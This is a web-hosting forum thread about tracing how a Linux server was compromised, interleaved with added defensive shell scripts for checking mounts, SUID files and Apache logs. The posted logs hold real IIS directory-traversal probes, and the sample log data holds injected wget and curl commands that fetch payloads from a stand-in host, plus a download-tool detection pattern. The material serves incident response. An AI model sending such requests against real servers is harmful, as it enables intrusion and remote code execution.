  1. #1
    Join Date: Apr 2004 | Location: India | Posts: 292

    I need to find the hacker's entry point into my server!! Security experts, can you help me?

    Hello All,
    I have a compromised server; I have already posted a query about it.
    Now my logwatch says this.
    My xferlogs say:
    --------------------- ftpd-xferlog Begin ------------------------

    TOTAL KB IN: 119KB (0MB)

    ---------------------- ftpd-xferlog End --------

    It seems that somebody uploaded something... very little, only 119 KB? Looks serious!!!

    [IMAPd] Logout stats:
    ====================
    User                                 | Logouts | Downloaded | Mbox Size
    -------------------------------------|---------|------------|----------
    ??? domain=???                       | 161     |            |
    beth@pachak.com domain=pachak.com    | 2       |            |
    jlong domain=s3tech.net              | 3       |            |
    joel domain=swspeed.com              | 12      |            |
    westerman@aknb.org domain=aknb.org   | 3       |            |
    -------------------------------------|---------|------------|----------
    Total                                | 181     | 0          | 0



    **Unmatched Entries**
    Connection timed out, while reading line user=david@devianconsult.com host=pcp03161084pcs.parads01.nm.comcast.net [68.35.41.63]: 1 Time(s)
    Connection timed out, while reading line user=david@pachak.com host=pcp03161084pcs.parads01.nm.comcast.net [68.35.41.63]: 1 Time(s)
    Logout user=??? domain=??? host=UNKNOWN: 12 Time(s)

    So many dropped packets:
    --------------------- Kernel Begin ------------------------


    Dropped 56 packets on interface eth0
    From 61.110.238.96 - 5 packets to tcp(17300,17300,17300,17300,17300)
    From 64.179.97.193 - 3 packets to tcp(2745)
    From 69.39.92.168 - 3 packets to tcp(2745)
    From 69.91.24.102 - 9 packets to tcp(1025,2745,6129)
    From 69.137.65.77 - 3 packets to tcp(2745)
    From 69.144.221.228 - 6 packets to tcp(1025,2745,6129)
    From 69.167.198.187 - 4 packets to tcp(1025,2745,6129)
    From 213.236.248.149 - 10 packets to tcp(4561,44464,4561,44464,4561,44464,4561,44464,4561,44464)
    From 218.89.104.161 - 3 packets to tcp(5554,5554,9898)
    From 221.143.42.23 - 10 packets to udp(1026,1026,1026,1026,1026)

    Logged 10 packets on interface eth0
    From 61.11.23.142 - 6 packets to tcp(22)
    From 69.240.64.97 - 4 packets to tcp(22)

    ---------------------- Kernel End -------------------------
    pam_unix says:
    Unknown Entries:
    2 more authentication failures; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=pcp09766260pcs.albqrq01.nm.comcast.net user=admin: 1 Time(s)

    -------------------------------------------------
    VERY SERIOUS LINE:
    PAM-listfile: Couldn't open /etc/ftpusers
    hosting.hidefweb.com (bgp01383292bgs.montbl01.nm.comcast.net[68.35.140.209]) - PAM(ryan@swspeed.com): User not known to the underlying authentication module.
    -----------------------------------------------------

    Now see some entries in access_log :
    root@hosting [~]# cat /usr/local/apache/logs/access_log | grep -i "/../"
    141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
    141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
    141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
    141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
    208.41.103.26 - - [27/Jul/2004:18:14:09 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
    208.41.103.26 - - [27/Jul/2004:18:18:14 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
    208.41.103.26 - - [27/Jul/2004:18:21:11 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
    208.41.103.26 - - [27/Jul/2004:18:24:04 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -

    Security experts, can you help me find the entry point? What must have gone wrong?
    What should I do?
    Any suggestions?
    thelinophile
    Thinking Different !!

  2. #2
    Join Date: Mar 2003 | Location: California USA | Posts: 13,681
    Those are entry points for IIS, not Linux.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  3. #3
    Join Date: Mar 2003 | Location: Rio de Janeiro - Brazil | Posts: 291

    Re: I need to find the hacker's entry point into my server!! Security experts, can you help me?

    Originally posted by atul
    Security experts, can you help me?
    Sure they can. But you'll get faster answers (and solutions) if you hire one... Talk to thelinuxguy (Steve, from http://www.rack911.com/); he'll be able to help you.

  4. #4
    Join Date: Mar 2003 | Location: Rio de Janeiro - Brazil | Posts: 291
    Oops... he replied first.

  5. #5
    Join Date: Mar 2003 | Location: California USA | Posts: 13,681
    cd /usr/local/apache/domlogs
    grep wget *
    I don't have time to explain it right now, but you should be able to figure it out.

  6. #6
    Greetings:

    How do you know your server is compromised?

    The command Steve wrote about will show whether the hacker got in via Apache/PHP/Perl CGI, etc., using wget from your server.

    Properly configured, mod_security from http://www.modsecurity.org/ will protect against such attacks; another good layer is to make wget, similar programs, and your compilers inaccessible to everyone except root.

    You may also want to review /var/log/secure and /var/log/messages.

    Thank you.
    ---
    Peter M. Abraham

  7. #7
    Join Date: Apr 2004 | Location: India | Posts: 292
    Hello dynamiscnt,
    Please look at this:

    root@hosting [/var/tmp/ls]# ls
    ./ dynip.sh* iroffer.tar mybot.ignl.bkup mybot.xdcc README x.xdcc
    ../ iroffer* Makefile mybot.log mybot.xdcc.bkup sample.config
    Configure* iroffer_chroot* Makefile.config mybot.log.2004-w28 mybot.xdcc.txt src/
    COPYING iroffer.cron* mybot.ignl mybot.msg obj/ WHATSNEW

    These were present, but I deleted them.
    And Mr. Security, how can you say that those are entry points for IIS and not for Linux? I have RHEL 3 on the server... and that server has been hacked...
    How can I check what the damage is?

  8. #8
    Greetings:

    The log entries you posted deal with attacks geared against IIS, not Linux. That's probably why Steve pointed out those particular log entries mean zero as it relates to your system and a compromise on your system.

    I take it /tmp was not secured (nosuid, noexec). Correct?

    Did you check through your Apache access log files searching for "wget" as Steve suggested?

    Thank you.
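    The mount-option check Peter asks about above, written out as an added example that is not part of the original thread. The function below reads a table in /proc/mounts layout (three constructed samples are embedded; on the live server pass it "$(cat /proc/mounts)") and reports, for /tmp, /var/tmp and /dev/shm, which of noexec, nosuid and nodev are missing. It also reports when one of those paths is not a separate mount at all, because a /var/tmp that is just a directory on / inherits the root filesystem's options and is wide open even when /tmp itself is locked down. The device names and option sets are mine, not the thread's.

```shell
#!/bin/sh
# Added example (not from the thread): check the scratch filesystems for the
# mount options that stop the classic drop-a-file-and-run-it in /tmp.

# Constructed mount table in /proc/mounts layout:
#   device mountpoint fstype options dump pass
# /tmp is hardened, /var/tmp and /dev/shm are not.
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
/dev/sda5 /tmp ext3 rw,noexec,nosuid,nodev 0 0
/dev/sda6 /var/tmp ext3 rw 0 0
none /dev/shm tmpfs rw 0 0'

# Constructed: the common case where /var/tmp is a plain directory on /.
SAMPLE_MOUNTS_NOVARTMP='/dev/sda1 / ext3 rw 0 0
/dev/sda5 /tmp ext3 rw,noexec,nosuid,nodev 0 0
none /dev/shm tmpfs rw,noexec,nosuid,nodev 0 0'

# Constructed: what a fully hardened table looks like.
SAMPLE_MOUNTS_HARDENED='/dev/sda1 / ext3 rw 0 0
/dev/sda5 /tmp ext3 rw,noexec,nosuid,nodev 0 0
/dev/sda5 /var/tmp ext3 rw,noexec,nosuid,nodev 0 0
none /dev/shm tmpfs rw,noexec,nosuid,nodev 0 0'

# check_tmp_mounts <mount table text>
# One line per scratch filesystem:
#   "<mountpoint> OK"                     all three options present
#   "<mountpoint> MISSING <opt,opt,...>"  options that are absent
#   "<mountpoint> NOT-A-MOUNT"            path is not its own filesystem
check_tmp_mounts() {
    printf '%s\n' "$1" | awk '
    BEGIN {
        split("noexec nosuid nodev", req, " ")
        split("/tmp /var/tmp /dev/shm", want, " ")
    }
    { seen[$2] = 1 }
    $2 == "/tmp" || $2 == "/var/tmp" || $2 == "/dev/shm" {
        for (k in have) delete have[k]
        n = split($4, opt, ",")
        for (i = 1; i <= n; i++) have[opt[i]] = 1
        missing = ""
        for (i = 1; i <= 3; i++)
            if (!(req[i] in have))
                missing = missing (missing == "" ? "" : ",") req[i]
        if (missing == "") print $2, "OK"; else print $2, "MISSING", missing
    }
    END {
        for (i = 1; i <= 3; i++)
            if (!(want[i] in seen)) print want[i], "NOT-A-MOUNT"
    }'
}

# tmp_hardened <mount table text>: exit 0 only when nothing is flagged.
tmp_hardened() {
    ! check_tmp_mounts "$1" | grep -Eq 'MISSING|NOT-A-MOUNT'
}

# Stand-alone demonstration on the constructed tables.
echo "== partially hardened =="; check_tmp_mounts "$SAMPLE_MOUNTS"
echo "== /var/tmp on / =="; check_tmp_mounts "$SAMPLE_MOUNTS_NOVARTMP"
echo "== hardened =="; check_tmp_mounts "$SAMPLE_MOUNTS_HARDENED"
# Live box: check_tmp_mounts "$(cat /proc/mounts)"
```

    One caveat a practitioner should keep in mind: noexec stops a dropped binary from being executed directly, but it does not stop an interpreter from reading a script out of the same directory (perl /var/tmp/bot.pl runs fine), so the mount options are a speed bump, not a fence, and the Apache log review is still the way to find the way in.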

  9. #9
    Join Date: Apr 2004 | Location: India | Posts: 292
    Hello,
    Did you see the logwatch I posted along with the access_log, which you say is an IIS attack?
    NO, /tmp was already secured, I mean before the attack, and quotas are enabled on it too!!!
    Please, can you analyse the logwatch, like the dropped packets, or this:
    2 more authentication failures; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=pcp09766260pcs.albqrq01.nm.comcast.net user=admin: 1 Time(s)

    and this, VERY SERIOUS:
    PAM-listfile: Couldn't open /etc/ftpusers
    hosting.hidefweb.com (bgp01383292bgs.montbl01.nm.comcast.net[68.35.140.209]) - PAM(ryan@swspeed.com): User not known to the underlying authentication module.

    I think you haven't seen these!! I think they are serious and may help me trace the entry point!!!
    What do you suggest??

  10. #10
    Join Date: Mar 2003 | Location: California USA | Posts: 13,681
    Atul, none of that is related to the attack you suffered. IIS is a Windows product, not a Linux product; that is why I said it means nothing, since you are on Linux, aka Red Hat.

    Those logwatch entries are a daily thing. You've got to learn to live with them.
    Check out: http://rfxnetworks.com/bfd.php

    Those scripts in your /var/tmp are not "harmful"; they are bad, but they will not compromise the root of the server. They are simply an IRC bot used to distribute files through DCC, also known as an XDCC bot.

    Your entry point was probably a PHP script, which has been mentioned to you many times in many posts, but you seem to be ignoring them.

  11. #11
    Join Date: Apr 2004 | Location: India | Posts: 292
    Hello Mr. Security,
    I am very sorry if I said anything abrupt!!!
    I didn't have any idea that those logwatch entries were safe to believe!!
    Thanks for that!!
    Yes, I know you have mentioned that the entry point is a PHP script,
    and I have enabled safe mode in php.ini and also disabled functions such as those mentioned...
    So that is already in place for PHP on the server!!! What can I do for it?
    Is there any way to find it?
    This is one more thing I wanted to show you, about SUID scripts:
    SUID and SGID files found: ( find / \( -perm -004000 -o -perm -002000 \) -type f -print )
    /home/invictus/public_html/postinfo.html
    /home/invictus/public_html/.htaccess
    /home/invictus/public_html/_vti_inf.html
    /home/invictus/public_html/auth.php
    /home/invictus/public_html/backend.php
    /home/invictus/public_html/banners.php
    /home/invictus/public_html/footer.php
    /home/invictus/public_html/header.php
    /home/invictus/public_html/index.php
    /home/invictus/public_html/mainfile.php
    /home/invictus/public_html/modules.php
    /home/invictus/public_html/robots.txt
    /home/invictus/public_html/ultramode.txt
    /home/invictus/public_html/config.~php
    find: /proc/27624/fd/4: No such file or directory
    find: /proc/27624/fd/4: No such file or directory
    /usr/sbin/usernetctl
    /usr/sbin/utempter
    /usr/sbin/exim
    /usr/sbin/suexec
    /usr/sbin/sendmail
    /usr/sbin/gnome-pty-helper
    /usr/bin/chage
    /usr/bin/gpasswd
    /usr/bin/wall
    /usr/bin/passwd
    /usr/bin/at
    /usr/bin/quota
    /usr/bin/crontab
    /usr/bin/lppasswd
    /usr/libexec/openssh/ssh-keysign
    /usr/local/urchin/bin/urchind
    /usr/local/urchin/util/geo-update
    /usr/local/urchin/util/u3importer
    /usr/local/urchin/util/uconf-driver
    /usr/local/urchin/util/uconf-export
    /usr/local/urchin/util/uconf-import
    /usr/local/urchin/util/uconf-schedule
    /usr/local/urchin/util/udb-sanitizer
    /usr/local/apache/bin/suexec
    /usr/local/cpanel/bin/cpwrap
    /usr/local/cpanel/bin/jailshell
    /usr/local/cpanel/3rdparty/mailman/mail/mailman
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/admindb
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/admin
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/confirm
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/edithtml
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/listinfo
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/options
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/private
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/rmlist
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/roster
    /usr/local/cpanel/3rdparty/mailman/cgi-bin/subscribe
    /usr/local/cpanel/cgi-sys/scgiwrap
    /bin/su
    /sbin/pam_timestamp_check
    /sbin/pwdb_chkpwd
    /sbin/unix_chkpwd
    /sbin/netreport

    I had already restricted wget to mode 700 before the attack...
    Do you see anything false in that list?
    Thank you, Mr. Security!! I have all faith in you!!
    Thanks again!!

  12. #12
    Join Date: Jul 2001 | Location: Singapore | Posts: 1,889
    FYI, to check or monitor for s[ug]id files, use sXid, which is good:
    http://freshmeat.net/projects/sxid/
    Giam Teck Choon
    :: Join choon.net Community today to share your tips and tricks on server issues please ::
    :: Singapore Dedicated Servers :: Singapore Virtual Private Servers :: Linux/FreeBSD Server Management ::

  13. #13
    Join Date: Apr 2004 | Location: India | Posts: 292
    Hello All,
    The sXid logs say this:
    I think, according to Mr. Security, some PHP script is the problem.
    I think it could be one of these:
    #sxid
    /home/invictus/public_html/config.~php^^32039^^32040^^36863^^1618916^^e417e7c1f4d43bd60f4d3fe5e4c3d32d
    /home/invictus/public_html/ultramode.txt^^32039^^32040^^36863^^1618914^^bdbb17421e5d5f4c24b611e86ade522e
    /home/invictus/public_html/robots.txt^^32039^^32040^^36863^^1618913^^089023af5da43c852e4d4d59c0ec3a9e
    /home/invictus/public_html/modules.php^^32039^^32040^^36863^^1618912^^41c871826e334e9470422adf665e1f81
    /home/invictus/public_html/mainfile.php^^32039^^32040^^36863^^1618911^^aefa54854aeb1000e897133a672c3199
    /home/invictus/public_html/index.php^^32039^^32040^^36863^^1618910^^e49bff767016bc21d2dcabfd799b358d
    /home/invictus/public_html/header.php^^32039^^32040^^36863^^1618908^^218bd1bac6599961d5727b9b744ec92d
    /home/invictus/public_html/footer.php^^32039^^32040^^36863^^1618907^^cdf7efd8e351ef1e5bb560d73abbbc0d
    /home/invictus/public_html/banners.php^^32039^^32040^^36863^^1618905^^748fa745809248efd600ca7c313ac6d4
    /home/invictus/public_html/backend.php^^32039^^32040^^36863^^1618904^^b731b8db128bcda3b36a1c0cdbf0fe7d
    /home/invictus/public_html/auth.php^^32039^^32040^^36863^^1618903^^624b56edae07c3f407facee7aaf6eafe
    /home/invictus/public_html/_vti_inf.html^^32039^^32040^^36863^^1618902^^5721e16914007736f8611fdd96ef0723
    /home/invictus/public_html/.htaccess^^32039^^32040^^36863^^1618899^^76eed586c54af24744ed41a3597d0afe
    /home/invictus/public_html/postinfo.html^^32039^^32040^^36863^^1618900^^1ccbd6660460154debbd1c011290722
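    The find output in #11 and the sXid records above are the same story in two formats, and neither is self-explanatory. As an added example that is not part of the original thread, the script below decodes records of the form path^^uid^^gid^^st_mode^^inode^^md5 (that field order is my reading of the posted output, an assumption, not something sXid's documentation is quoted for here) and says which setuid/setgid files deserve attention. The arithmetic is the useful part: 36863 decimal is 0107777 octal, that is a regular file with setuid, setgid, sticky and rwxrwxrwx permissions, which is why every one of those PHP files appeared in the SUID/SGID find. Setuid or setgid bits on a world-writable file under a web DocumentRoot owned by a non-root account are flagged; the ordinary root-owned system binaries are reported as expected. The sample records are constructed (the web-root record reuses the st_mode value from the post, the hashes are dummies).

```shell
#!/bin/sh
# Added example (not from the thread): decode sXid-style records and
# classify setuid/setgid files.
#
# Assumed record layout (my reading of the posted output):
#   path^^uid^^gid^^st_mode^^inode^^md5     st_mode is decimal as stat(2) gives it

# Constructed records: one web-root PHP file with the st_mode seen in the
# thread (36863 = 0107777), plus two normal system binaries.
SAMPLE_SXID='/home/example/public_html/mainfile.php^^32039^^32040^^36863^^1618911^^00000000000000000000000000000001
/usr/bin/passwd^^0^^0^^35309^^131075^^00000000000000000000000000000002
/usr/bin/wall^^0^^5^^34157^^131076^^00000000000000000000000000000003'

# decode_sxid <records text>
# One line per record: "<verdict> <path> mode=<octal perms> uid=<uid> flags=<...>"
decode_sxid() {
    printf '%s\n' "$1" | awk '
    BEGIN { FS = "\\^\\^" }
    NF < 4 { next }
    {
        path = $1; uid = $2 + 0; mode = $4 + 0
        # Permission bits by integer arithmetic (POSIX awk has no bitwise ops):
        # setuid 04000 = 2048, setgid 02000 = 1024, sticky 01000 = 512,
        # world-writable 0002 = 2.
        flags = ""
        if (int(mode / 2048) % 2) flags = flags "setuid,"
        if (int(mode / 1024) % 2) flags = flags "setgid,"
        if (int(mode / 512) % 2)  flags = flags "sticky,"
        if (int(mode / 2) % 2)    flags = flags "world-writable,"
        sub(/,$/, "", flags)
        # A setuid/setgid file is suspect when it sits under a web DocumentRoot,
        # belongs to a non-root account, or can be rewritten by anyone.
        verdict = "expected"
        if (flags ~ /set[ug]id/ &&
            (path ~ /\/public_html\// || uid != 0 || flags ~ /world-writable/))
            verdict = "SUSPECT"
        # mode % 4096 drops the file-type bits (0100000 for a regular file).
        printf "%s %s mode=%04o uid=%d flags=%s\n", verdict, path, mode % 4096, uid, flags
    }'
}

# Stand-alone demonstration on the constructed records.
decode_sxid "$SAMPLE_SXID"
# Live box: decode_sxid "$(cat your_sxid_report)"
```

    For the "expected" entries the next step on a Red Hat system is rpm -Vf on each path, which compares the installed file against the package database and reports a changed size, mode or digest; a setuid root binary that fails that check is a replaced binary, not a false positive.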

  14. #14
    Join Date: Mar 2003 | Location: California USA | Posts: 13,681
    That's no problem ^^

  15. #15
    Join Date: Apr 2004 | Location: India | Posts: 292
    Hello Mr. Security,
    May I know how you can say that? These are the only PHP SUID scripts found to be doubtful!!!
    What does that output mean? Can you please explain it briefly?
    Where and how should I look for a false .php script? How should I check the damage done to the system?
    Thanks once again!

  16. #16
    Greetings:

    Did you check through your Apache access log files searching for "wget" as Steve suggested?

    Thank you.

  17. #17
    Join Date: Apr 2003 | Location: NC | Posts: 3,093
    If you want help, you are going to have to listen to what others have said... the wget thing is a very common entry method and the first thing to check.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service
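    The check recommended in #5, #6, #16 and #17 (grep the Apache domlogs for wget), written out as an added example that is not from the thread. Apache logs the request line still percent-encoded, so a plain grep for wget catches the common case but misses a fully encoded tool name (%77get) and leaves the injected command hard to read; the script below decodes %XX and '+' in the request first, matches wget, curl, lynx and fetch as whole words, and then ranks the client addresses so the attacker's host stands out. The log lines are constructed in Common Log Format; the addresses, paths and URLs are invented (the first two lines imitate the IIS-style probes from #1, which correctly do not match).

```shell
#!/bin/sh
# Added example (not from the thread): the "grep wget *" hunt over Apache
# domlogs, with URL decoding and a per-client tally.

# Constructed sample log in Common Log Format:
#   client ident user [time] "METHOD URL PROTO" status bytes
SAMPLE_LOG='198.51.100.23 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
198.51.100.26 - - [27/Jul/2004:18:14:09 -0600] "GET /msadc/..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 -
198.51.100.5 - - [10/Jul/2004:02:11:43 -0600] "GET /modules.php?name=Search&query=;wget%20http://203.0.113.9/iroffer.tar HTTP/1.1" 200 512
198.51.100.5 - - [10/Jul/2004:02:12:01 -0600] "GET /modules.php?name=Search&query=;tar+xf+iroffer.tar HTTP/1.1" 200 512
198.51.100.5 - - [10/Jul/2004:02:12:30 -0600] "GET /index.php?file=http%3A%2F%2F203.0.113.9%2Fcmd.txt%3F&c=curl+-O+http://203.0.113.9/x HTTP/1.1" 200 2048
198.51.100.77 - - [10/Jul/2004:04:40:12 -0600] "GET /index.php?cmd=%77%67%65%74+http%3A%2F%2F203.0.113.9%2Fbot.tgz HTTP/1.1" 200 77
192.0.2.44 - - [11/Jul/2004:09:00:00 -0600] "GET /about.php HTTP/1.1" 200 3120'

# find_fetchers [logfile...]   (reads stdin when no files are given)
# Prints "<client> <time> <decoded request url>" for every request whose
# decoded URL names a download tool.
find_fetchers() {
    awk '
    # Hex digit to number without strtonum(), which plain awk lacks.
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    # Decode %XX escapes and "+" so encoded tool names become searchable.
    function urldecode(s,    out, i, c, hh) {
        out = ""
        for (i = 1; i <= length(s); i++) {
            c = substr(s, i, 1)
            hh = substr(s, i + 1, 2)
            if (c == "+") {
                out = out " "
            } else if (c == "%" && hh ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                out = out sprintf("%c", hexval(substr(hh, 1, 1)) * 16 + hexval(substr(hh, 2, 1)))
                i += 2
            } else {
                out = out c
            }
        }
        return out
    }
    {
        req = $0
        sub(/^[^"]*"/, "", req)     # drop everything before the request line
        sub(/".*$/, "", req)        # drop the closing quote, status and bytes
        split(req, part, " ")       # part[2] is the URL
        url = urldecode(part[2])
        # Tool name as a whole word anywhere in the decoded request.
        if (tolower(" " url " ") ~ /[^a-z](wget|curl|lynx|fetch)[^a-z]/)
            print $1, $4, url
    }' "$@"
}

# fetcher_sources [logfile...]: "<hits> <client>" sorted by hits, descending.
fetcher_sources() {
    find_fetchers "$@" | awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Stand-alone demonstration on the constructed log.
printf '%s\n' "$SAMPLE_LOG" | find_fetchers
printf '%s\n' "$SAMPLE_LOG" | fetcher_sources
# Live cPanel box: find_fetchers /usr/local/apache/domlogs/*
```

    The first hit for a given client is the line to read closely: the script parameter it abused is the vulnerable PHP script, and the URL it fetched from is where the /var/tmp bot came from.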
